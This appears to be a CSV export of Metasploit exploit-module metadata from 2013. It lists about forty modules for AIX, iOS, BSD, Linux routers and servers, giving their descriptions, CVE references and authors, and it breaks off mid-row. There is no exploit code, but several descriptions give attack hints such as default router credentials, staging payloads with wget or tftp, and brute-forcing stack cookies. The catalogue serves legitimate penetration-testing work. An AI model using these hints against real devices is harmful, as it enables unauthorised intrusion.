"id","mtime","file","mtype","refname","fullname","name","rank","description","license","privileged","disclosure_date","default_target","default_action","stance","ready","ref_names","author_names" 1,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/aix/rpc_cmsd_opcode21.rb","exploit","aix/rpc_cmsd_opcode21","exploit/aix/rpc_cmsd_opcode21","AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow",500,"This module exploits a buffer overflow vulnerability in opcode 21 handled by rpc.cmsd on AIX. By making a request with a long string passed to the first argument of the ""rtable_create"" RPC, a stack based buffer overflow occurs. This leads to arbitrary code execution. NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where further attempts are not possible.","Metasploit Framework License (BSD)","f","2009-10-07 00:00:00",0,,"aggressive","t","BID-36615, CVE-2009-3699, OSVDB-58726, URL-http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825","Rodrigo Rubira Branco (BSDaemon), jduck " 2,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/aix/rpc_ttdbserverd_realpath.rb","exploit","aix/rpc_ttdbserverd_realpath","exploit/aix/rpc_ttdbserverd_realpath","ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)",500,"This module exploits a buffer overflow vulnerability in _tt_internal_realpath function of the ToolTalk database server (rpc.ttdbserverd).","Metasploit Framework License (BSD)","f","2009-06-17 00:00:00",0,,"aggressive","t","CVE-2009-2727, OSVDB-55151","Adriano Lima , Ramon de C Valle " 3,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/apple_ios/browser/safari_libtiff.rb","exploit","apple_ios/browser/safari_libtiff","exploit/apple_ios/browser/safari_libtiff","Apple iOS MobileSafari LibTIFF Buffer Overflow",400,"This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload.","Metasploit Framework License (BSD)","f","2006-08-01 00:00:00",0,,"passive","t","BID-19283, CVE-2006-3459, OSVDB-27723","hdm , kf " 4,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/apple_ios/email/mobilemail_libtiff.rb","exploit","apple_ios/email/mobilemail_libtiff","exploit/apple_ios/email/mobilemail_libtiff","Apple iOS MobileMail LibTIFF Buffer Overflow",400,"This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload.","Metasploit Framework License (BSD)","f","2006-08-01 00:00:00",0,,"passive","t","BID-19283, CVE-2006-3459, OSVDB-27723","hdm , kf " 5,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb","exploit","apple_ios/ssh/cydia_default_ssh","exploit/apple_ios/ssh/cydia_default_ssh","Apple iOS Default SSH Password Vulnerability",600,"This module exploits the default credentials of Apple iOS when it has been jailbroken and the passwords for the 'root' and 'mobile' users have not been changed.","Metasploit Framework License (BSD)","t","2007-07-02 00:00:00",0,,"aggressive","t","OSVDB-61284","hdm " 6,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/bsdi/softcart/mercantec_softcart.rb","exploit","bsdi/softcart/mercantec_softcart","exploit/bsdi/softcart/mercantec_softcart","Mercantec SoftCart CGI Overflow",500,"This is an exploit for an undisclosed buffer overflow in the SoftCart.exe CGI as shipped with Mercantec's shopping cart software. It is possible to execute arbitrary code by passing a malformed CGI parameter in an HTTP GET request. This issue is known to affect SoftCart version 4.00b.","Metasploit Framework License (BSD)","f","2004-08-19 00:00:00",0,,"aggressive","t","BID-10926, CVE-2004-2221, OSVDB-9011","skape , trew" 7,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/dialup/multi/login/manyargs.rb","exploit","dialup/multi/login/manyargs","exploit/dialup/multi/login/manyargs","System V Derived /bin/login Extraneous Arguments Buffer Overflow",400,"This exploit connects to a system's modem over dialup and exploits a buffer overlflow vulnerability in it's System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments.","Metasploit Framework License (BSD)","f","2001-12-12 00:00:00",0,,"aggressive","t","BID-3681, CVE-2001-0797, OSVDB-690, OSVDB-691, URL-http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html, URL-http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html","I)ruid " 8,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb","exploit","freebsd/ftp/proftp_telnet_iac","exploit/freebsd/ftp/proftp_telnet_iac","ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)",500,"This module exploits a stack-based buffer overflow in versions of ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code.","Metasploit Framework License (BSD)","t","2010-11-01 00:00:00",0,,"aggressive","t","BID-44562, CVE-2010-4221, OSVDB-68985","jduck " 9,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/freebsd/samba/trans2open.rb","exploit","freebsd/samba/trans2open","exploit/freebsd/samba/trans2open","Samba trans2open Overflow (*BSD x86)",500,"This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set.","Metasploit Framework License (BSD)","t","2003-04-07 00:00:00",0,,"aggressive","t","BID-7294, CVE-2003-0201, OSVDB-4469, URL-http://seclists.org/bugtraq/2003/Apr/103","hdm , jduck " 10,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/freebsd/tacacs/xtacacsd_report.rb","exploit","freebsd/tacacs/xtacacsd_report","exploit/freebsd/tacacs/xtacacsd_report","XTACACSD <= 4.1.2 report() Buffer Overflow",200,"This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By sending a specially crafted XTACACS packet with an overly long username, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-01-08 00:00:00",0,,"aggressive","t","CVE-2008-7232, OSVDB-58140, URL-http://aluigi.altervista.org/adv/xtacacsdz-adv.txt","MC " 11,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb","exploit","freebsd/telnet/telnet_encrypt_keyid","exploit/freebsd/telnet/telnet_encrypt_keyid","FreeBSD Telnet Service Encryption Key ID Buffer Overflow",500,"This module exploits a buffer overflow in the encryption option handler of the FreeBSD telnet service.","Metasploit Framework License (BSD)","t","2011-12-23 00:00:00",0,,"aggressive","t","BID-51182, CVE-2011-4862, EDB-18280, OSVDB-78020","Brandon Perry , Dan Rosenberg, Jaime Penalba Estebanez , hdm " 12,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/hpux/lpd/cleanup_exec.rb","exploit","hpux/lpd/cleanup_exec","exploit/hpux/lpd/cleanup_exec","HP-UX LPD Command Execution",600,"This exploit abuses an unpublished vulnerability in the HP-UX LPD service. This flaw allows an unauthenticated attacker to execute arbitrary commands with the privileges of the root user. The LPD service is only exploitable when the address of the attacking system can be resolved by the target. This vulnerability was silently patched with the buffer overflow flaws addressed in HP Security Bulletin HPSBUX0208-213.","Metasploit Framework License (BSD)","f","2002-08-28 00:00:00",0,,"aggressive","t","CVE-2002-1473, OSVDB-9638, URL-http://archives.neohapsis.com/archives/hp/2002-q3/0064.html","hdm " 13,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/irix/lpd/tagprinter_exec.rb","exploit","irix/lpd/tagprinter_exec","exploit/irix/lpd/tagprinter_exec","Irix LPD tagprinter Command Execution",600,"This module exploits an arbitrary command execution flaw in the in.lpd service shipped with all versions of Irix.","Metasploit Framework License (BSD)","f","2001-09-01 00:00:00",0,,"aggressive","t","CVE-2001-0800, OSVDB-8573, URL-http://www.lsd-pl.net/code/IRIX/irx_lpsched.c","hdm , optyx " 14,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb","exploit","linux/browser/adobe_flashplayer_aslaunch","exploit/linux/browser/adobe_flashplayer_aslaunch","Adobe Flash Player ActionScript Launch Command Execution Vulnerability",400,"This module exploits a vulnerability in Adobe Flash Player for Linux, version 10.0.12.36 and 9.0.151.0 and prior. An input validation vulnerability allows command execution when the browser loads a SWF file which contains shell metacharacters in the arguments to the ActionScript launch method. The victim must have Adobe AIR installed for the exploit to work. This module was tested against version 10.0.12.36 (10r12_36).","Metasploit Framework License (BSD)","f","2008-12-17 00:00:00",0,,"passive","t","BID-32896, CVE-2008-5499, OSVDB-50796, URL-http://www.adobe.com/support/security/bulletins/apsb08-24.html","0a29406d9794e4f9b30b3c5d6702c708" 15,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/ftp/proftp_sreplace.rb","exploit","linux/ftp/proftp_sreplace","exploit/linux/ftp/proftp_sreplace","ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)",500,"This module exploits a stack-based buffer overflow in versions 1.2 through 1.3.0 of ProFTPD server. The vulnerability is within the ""sreplace"" function within the ""src/support.c"" file. The off-by-one heap overflow bug in the ProFTPD sreplace function has been discovered about 2 (two) years ago by Evgeny Legerov. We tried to exploit this off-by-one bug via MKD command, but failed. We did not work on this bug since then. Actually, there are exists at least two bugs in sreplace function, one is the mentioned off-by-one heap overflow bug the other is a stack-based buffer overflow via 'sstrncpy(dst,src,negative argument)'. We were unable to reach the ""sreplace"" stack bug on ProFTPD 1.2.10 stable version, but the version 1.3.0rc3 introduced some interesting changes, among them: 1. another (integer) overflow in sreplace! 2. now it is possible to reach sreplace stack-based buffer overflow bug via the ""pr_display_file"" function! 3. stupid '.message' file display bug So we decided to choose ProFTPD 1.3.0 as a target for our exploit. To reach the bug, you need to upload a specially created .message file to a writeable directory, then do ""CWD "" to trigger the invocation of sreplace function. Note that ProFTPD 1.3.0rc3 has introduced a stupid bug: to display '.message' file you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug. The exploit is a part of VulnDisco Pack since Dec 2005.","Metasploit Framework License (BSD)","t","2006-11-26 00:00:00",0,,"aggressive","t","BID-20992, CVE-2006-5815, OSVDB-68985, URL-http://bugs.proftpd.org/show_bug.cgi?id=2858, URL-http://proftp.cvs.sourceforge.net/proftp/proftpd/src/main.c?view=diff&r1=text&tr1=1.292&r2=text&tr2=1.294&diff_format=h, URL-http://seclists.org/bugtraq/2006/Nov/538, URL-http://seclists.org/bugtraq/2006/Nov/94","Evgeny Legerov , jduck " 16,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/ftp/proftp_telnet_iac.rb","exploit","linux/ftp/proftp_telnet_iac","exploit/linux/ftp/proftp_telnet_iac","ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)",500,"This module exploits a stack-based buffer overflow in versions of ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code. The Debian Squeeze version of the exploit uses a little ROP stub to indirectly transfer the flow of execution to a pool buffer (the cmd_rec ""res"" in ""pr_cmd_read""). The Ubuntu version uses a ROP stager to mmap RWX memory, copy a small stub to it, and execute the stub. The stub then copies the remainder of the payload in and executes it. NOTE: Most Linux distributions either do not ship a vulnerable version of ProFTPD, or they ship a version compiled with stack smashing protection. Although SSP significantly reduces the probability of a single attempt succeeding, it will not prevent exploitation. Since the daemon forks in a default configuration, the cookie value will remain the same despite some attemtps failing. By making repeated requests, an attacker can eventually guess the cookie value and exploit the vulnerability. The cookie in Ubuntu has 24-bits of entropy. This reduces the effectiveness and could allow exploitation in semi-reasonable amount of time.","Metasploit Framework License (BSD)","t","2010-11-01 00:00:00",0,,"aggressive","t","BID-44562, CVE-2010-4221, OSVDB-68985","jduck " 17,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/games/ut2004_secure.rb","exploit","linux/games/ut2004_secure","exploit/linux/games/ut2004_secure","Unreal Tournament 2004 ""secure"" Overflow (Linux)",400,"This is an exploit for the GameSpy secure query in the Unreal Engine. This exploit only requires one UDP packet, which can be both spoofed and sent to a broadcast address. Usually, the GameSpy query server listens on port 7787, but you can manually specify the port as well. The RunServer.sh script will automatically restart the server upon a crash, giving us the ability to bruteforce the service and exploit it multiple times.","BSD License","t","2004-06-18 00:00:00",,,"aggressive","t","BID-10570, CVE-2004-0608, OSVDB-7217","onetwo" 18,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb","exploit","linux/http/alcatel_omnipcx_mastercgi_exec","exploit/linux/http/alcatel_omnipcx_mastercgi_exec","Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution",0,"This module abuses a metacharacter injection vulnerability in the HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise Communication Server 7.1 and earlier. The Unified Maintenance Tool contains a 'masterCGI' binary which allows an unauthenticated attacker to execute arbitrary commands by specifing shell metacharaters as the 'user' within the 'ping' action to obtain 'httpd' user access. This module only supports command line payloads, as the httpd process kills the reverse/bind shell spawn after the HTTP 200 OK response.","Metasploit Framework License (BSD)","f","2007-09-09 00:00:00",0,,"aggressive","t","BID-25694, CVE-2007-3010, OSVDB-40521, URL-http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm","patrick " 19,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/ddwrt_cgibin_exec.rb","exploit","linux/http/ddwrt_cgibin_exec","exploit/linux/http/ddwrt_cgibin_exec","DD-WRT HTTP Daemon Arbitrary Command Execution",600,"This module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account.","Metasploit Framework License (BSD)","t","2009-07-20 00:00:00",0,,"aggressive","t","BID-35742, CVE-2009-2765, EDB-9209, OSVDB-55990","gat3way, hdm " 20,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb","exploit","linux/http/dlink_diagnostic_exec_noauth","exploit/linux/http/dlink_diagnostic_exec_noauth","DLink DIR-645 / DIR-815 diagnostic.php Command Execution",600,"Some DLink Routers are vulnerable to OS Command injection in the web interface. On DIR-645 versions prior 1.03 authentication isn't needed to exploit it. On version 1.03 authentication is needed in order to trigger the vulnerability, which has been fixed definitely on version 1.04. Other DLink products, like DIR-300 rev B and DIR-600, are also affected by this vulnerability. Not every device includes wget which we need for deploying our payload. On such devices you could use the cmd generic payload and try to start telnetd or execute other commands. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. This module has been tested successfully on DIR-645 prior to 1.03, where authentication isn't needed in order to exploit the vulnerability.","Metasploit Framework License (BSD)","t","2013-03-05 00:00:00",1,,"passive","t","BID-58938, EDB-24926, OSVDB-92144, URL-http://www.s3cur1ty.de/m1adv2013-017","Michael Messner , juan vazquez " 21,"2013-05-20 21:27:11","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/dlink_dir615_up_exec.rb","exploit","linux/http/dlink_dir615_up_exec","exploit/linux/http/dlink_dir615_up_exec","D-Link DIR615h OS Command Injection",600,"Some D-Link Routers are vulnerable to an authenticated OS command injection on their web interface, where default credentials are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. This module was tested against a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a controlled system could be used for testing purposes. The exploit uses the wget client from the device to convert the command injection into an arbitrary payload execution.","Metasploit Framework License (BSD)","t","2013-02-07 00:00:00",1,,"passive","t","BID-57882, EDB-24477, OSVDB-90174, URL-http://www.s3cur1ty.de/m1adv2013-008","Michael Messner , juan vazquez " 22,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/dolibarr_cmd_exec.rb","exploit","linux/http/dolibarr_cmd_exec","exploit/linux/http/dolibarr_cmd_exec","Dolibarr ERP & CRM 3 Post-Auth OS Command Injection",600,"This module exploits a vulnerability found in Dolibarr ERP/CRM's backup feature. This software is used to manage a company's business information such as contacts, invoices, orders, stocks, agenda, etc. When processing a database backup request, the export.php function does not check the input given to the sql_compat parameter, which allows a remote authenticated attacker to inject system commands into it, and then gain arbitrary code execution.","Metasploit Framework License (BSD)","f","2012-04-06 00:00:00",0,,"aggressive","t","OSVDB-80980, URL-http://seclists.org/fulldisclosure/2012/Apr/78","Nahuel Grisolia , sinn3r " 23,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/dreambox_openpli_shell.rb","exploit","linux/http/dreambox_openpli_shell","exploit/linux/http/dreambox_openpli_shell","OpenPLI Webif Arbitrary Command Execution",500,"Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS command injection in the Webif 6.0.4 Web Interface. This is a blind injection, which means that you will not see any output of your command. A ping command can be used for testing the vulnerability. This module has been tested in a box with the next features: Linux Kernel version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1 Wed Aug 17 23:54:07 CEST 2011, Firmware release 1.1.0 (27.01.2013), FP Firmware 1.06 and Web Interface 6.0.4-Expert (PLi edition).","Metasploit Framework License (BSD)","t","2013-02-08 00:00:00",0,,"aggressive","t","BID-57943, EDB-24498, OSVDB-90230, URL-http://openpli.org/wiki/Webif, URL-http://www.s3cur1ty.de/m1adv2013-007","Michael Messner " 24,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/esva_exec.rb","exploit","linux/http/esva_exec","exploit/linux/http/esva_exec","E-Mail Security Virtual Appliance learn-msg.cgi Command Injection",600,"This module exploits a command injection vulnerability found in E-Mail Security Virtual Appliance. This module abuses the learn-msg.cgi file to execute arbitrary OS commands without authentication. This module has been successfully tested on the ESVA_2057 appliance.","Metasploit Framework License (BSD)","f","2012-08-16 00:00:00",0,,"aggressive","t","BID-55050, EDB-20551","iJoo, juan vazquez " 25,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/gpsd_format_string.rb","exploit","linux/http/gpsd_format_string","exploit/linux/http/gpsd_format_string","Berlios GPSD Format String Vulnerability",200,"This module exploits a format string vulnerability in the Berlios GPSD server. This vulnerability was discovered by Kevin Finisterre.","Metasploit Framework License (BSD)","f","2005-05-25 00:00:00",,,"aggressive","t","BID-12371, CVE-2004-1388, OSVDB-13199, URL-http://www.securiteam.com/unixfocus/5LP0M1PEKK.html","Yann Senotier " 26,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb","exploit","linux/http/groundwork_monarch_cmd_exec","exploit/linux/http/groundwork_monarch_cmd_exec","GroundWork monarch_scan.cgi OS Command Injection",600,"This module exploits a vulnerability found in GroundWork 6.7.0. This software is used for network, application and cloud monitoring. The vulnerability exists in the monarch_scan.cgi where user controlled input is used in the perl qx function. This allows any remote authenticated attacker, regardless of privileges, to inject system commands and gain arbitrary code execution. The module has been tested successfully on GroundWork 6.7.0-br287-gw1571 as distributed within the Ubuntu 10.04 based VM appliance.","Metasploit Framework License (BSD)","f","2013-03-08 00:00:00",0,,"aggressive","t","OSVDB-91051, URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130308-0_GroundWork_Monitoring_Multiple_critical_vulnerabilities_wo_poc_v10.txt, US-CERT-VU-345260","Johannes Greil, juan vazquez " 27,"2013-05-30 14:36:26","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/hp_system_management.rb","exploit","linux/http/hp_system_management","exploit/linux/http/hp_system_management","HP System Management Anonymous Access Code Execution",300,"This module exploits an anonymous remote code execution on HP System Management 7.1.1 and earlier. The vulnerability exists when handling the iprange parameter on a request against /proxy/DataValidation. In order to work HP System Management must be configured with Anonymous access enabled.","Metasploit Framework License (BSD)","f","2012-09-01 00:00:00",0,,"aggressive","t","OSVDB-91812","agix" 28,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/linksys_apply_cgi.rb","exploit","linux/http/linksys_apply_cgi","exploit/linux/http/linksys_apply_cgi","Linksys WRT54 Access Point apply.cgi Buffer Overflow",500,"This module exploits a stack buffer overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers. According to iDefense who discovered this vulnerability, all WRT54G versions prior to 4.20.7 and all WRT54GS version prior to 1.05.2 may be be affected.","Metasploit Framework License (BSD)","f","2005-09-13 00:00:00",0,,"aggressive","t","CVE-2005-2799, OSVDB-19389, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305","Julien Tinnes , Raphael Rigo " 29,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/linksys_e1500_apply_exec.rb","exploit","linux/http/linksys_e1500_apply_exec","exploit/linux/http/linksys_e1500_apply_exec","Linksys E1500/E2500 apply.cgi Remote Command Injection",600,"Some Linksys Routers are vulnerable to an authenticated OS command injection. Default credentials for the web interface are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes.","Metasploit Framework License (BSD)","t","2013-02-05 00:00:00",1,,"passive","t","BID-57760, EDB-24475, OSVDB-89912, URL-http://www.s3cur1ty.de/m1adv2013-004","Michael Messner , juan vazquez " 30,"2013-05-20 21:27:11","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb","exploit","linux/http/linksys_wrt160nv2_apply_exec","exploit/linux/http/linksys_wrt160nv2_apply_exec","Linksys WRT160nv2 apply.cgi Remote Command Injection",600,"Some Linksys Routers are vulnerable to an authenticated OS command injection on their web interface where default credentials are admin/admin or admin/password. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload. This module has been tested on a Linksys WRT160n version 2 - firmware version v2.0.03. A ping command against a controlled system could be used for testing purposes. The exploit uses the tftp client from the device to stage to native payloads from the command injection.","Metasploit Framework License (BSD)","t","2013-02-11 00:00:00",1,,"aggressive","t","BID-57887, EDB-24478, OSVDB-90093, URL-http://www.s3cur1ty.de/m1adv2013-012","Michael Messner , juan vazquez " 31,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb","exploit","linux/http/linksys_wrt54gl_apply_exec","exploit/linux/http/linksys_wrt54gl_apply_exec","Linksys WRT54GL apply.cgi Command Execution",0,"Some Linksys Routers are vulnerable to an authenticated OS command injection in the Web Interface. Default credentials are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. The user must be prudent when using this module since it modifies the router configuration while exploitation, even when it tries to restore previous values.","Metasploit Framework License (BSD)","t","2013-01-18 00:00:00",1,,"passive","t","BID-57459, EDB-24202, OSVDB-89912, URL-http://www.s3cur1ty.de/m1adv2013-001","Michael Messner , juan vazquez " 32,"2013-05-16 16:06:27","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/mutiny_frontend_upload.rb","exploit","linux/http/mutiny_frontend_upload","exploit/linux/http/mutiny_frontend_upload","Mutiny 5 Arbitrary File Upload",600,"This module exploits a code execution flaw in the Mutiny 5 appliance. The EditDocument servlet provides a file upload function to authenticated users. A directory traversal vulnerability in the same functionality allows for arbitrary file upload, which results in arbitrary code execution with root privileges. In order to exploit the vulnerability a valid user (any role) in the web frontend is required. The module has been tested successfully on the Mutiny 5.0-1.07 appliance.","Metasploit Framework License (BSD)","t","2013-05-15 00:00:00",0,,"aggressive","t","CVE-2013-0136, URL-https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities, US-CERT-VU-701572","juan vazquez " 33,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb","exploit","linux/http/netgear_dgn1000b_setup_exec","exploit/linux/http/netgear_dgn1000b_setup_exec","Netgear DGN1000B setup.cgi Remote Command Execution",600,"Some Netgear Routers are vulnerable to authenticated OS Command injection. The vulnerability exists in the web interface, specifically in the setup.cgi component, when handling the TimeToLive parameter. Default credentials are always a good starting point, admin/admin or admin/password could be a first try. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes.","Metasploit Framework License (BSD)","t","2013-02-06 00:00:00",1,,"passive","t","BID-57836, EDB-24464, OSVDB-89985, URL-http://www.s3cur1ty.de/m1adv2013-005","Michael Messner , juan vazquez " 34,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb","exploit","linux/http/netgear_dgn2200b_pppoe_exec","exploit/linux/http/netgear_dgn2200b_pppoe_exec","Netgear DGN2200B pppoe.cgi Remote Command Execution",0,"Some Netgear Routers are vulnerable to an authenticated OS command injection on their web interface. Default credentials for the web interface are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. This module overwrites parts of the PPOE configuration, while the module tries to restore it after exploitation configuration backup is recommended.","Metasploit Framework License (BSD)","t","2013-02-15 00:00:00",1,,"passive","t","BID-57998, EDB-24513, OSVDB-90320, URL-http://www.s3cur1ty.de/m1adv2013-015","Michael Messner , juan vazquez " 35,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/nginx_chunked_size.rb","exploit","linux/http/nginx_chunked_size","exploit/linux/http/nginx_chunked_size","Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow",300,"This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx. The exploit first triggers an integer overflow in the ngx_http_parse_chunked() by supplying an overly long hex value as chunked block size. This value is later used when determining the number of bytes to read into a stack buffer, thus the overflow becomes possible.","Metasploit Framework License (BSD)","f","2013-05-07 00:00:00",0,,"aggressive","t","CVE-2013-2028, OSVDB-93037, URL-http://nginx.org/en/security_advisories.html, URL-http://packetstormsecurity.com/files/121560/Nginx-1.3.9-1.4.0-Stack-Buffer-Overflow.html","Greg MacManus, hal, saelo" 36,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/openfiler_networkcard_exec.rb","exploit","linux/http/openfiler_networkcard_exec","exploit/linux/http/openfiler_networkcard_exec","Openfiler v2.x NetworkCard Command Execution",600,"This module exploits a vulnerability in Openfiler v2.x which could be abused to allow authenticated users to execute arbitrary code under the context of the 'openfiler' user. The 'system.html' file uses user controlled data from the 'device' parameter to create a new 'NetworkCard' object. The class constructor in 'network.inc' calls exec() with the supplied data. The 'openfiler' user may 'sudo /bin/bash' without providing a system password.","Metasploit Framework License (BSD)","f","2012-09-04 00:00:00",0,,"aggressive","t","BID-55490, URL-http://itsecuritysolutions.org/2012-09-06-Openfiler-v2.x-multiple-vulnerabilities/","Brendan Coles " 37,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/peercast_url.rb","exploit","linux/http/peercast_url","exploit/linux/http/peercast_url","PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)",200,"This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.","BSD License","f","2006-03-08 00:00:00",,,"aggressive","t","BID-17040, CVE-2006-1148, OSVDB-23777, URL-http://www.infigo.hr/in_focus/INFIGO-2006-03-01","MC " 38,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/piranha_passwd_exec.rb","exploit","linux/http/piranha_passwd_exec","exploit/linux/http/piranha_passwd_exec","RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution",600,"This module abuses two flaws - a metacharacter injection vulnerability in the HTTP management server of RedHat 6.2 systems running the Piranha LVS cluster service and GUI (rpm packages: piranha and piranha-gui). The vulnerability allows an authenticated attacker to execute arbitrary commands as the Apache user account (nobody) within the /piranha/secure/passwd.php3 script. The package installs with a default user and password of piranha:q which was exploited in the wild.","Metasploit Framework License (BSD)","f","2000-04-04 00:00:00",0,,"aggressive","t","BID-1148, BID-1149, CVE-2000-0248, CVE-2000-0322, OSVDB-1300, OSVDB-289","patrick " 39,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/symantec_web_gateway_exec.rb","exploit","linux/http/symantec_web_gateway_exec","exploit/linux/http/symantec_web_gateway_exec","Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",600,"This module exploits a command injection vulnerability found in Symantec Web Gateway's HTTP service due to the insecure usage of the exec() function. This module abuses the spywall/ipchange.php file to execute arbitrary OS commands without authentication.","Metasploit Framework License (BSD)","f","2012-05-17 00:00:00",0,,"aggressive","t","BID-53444, CVE-2012-0297, URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-090","Tenable Network Security, juan vazquez " 40,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb","exploit","linux/http/symantec_web_gateway_file_upload","exploit/linux/http/symantec_web_gateway_file_upload","Symantec Web Gateway 5.0.2.8 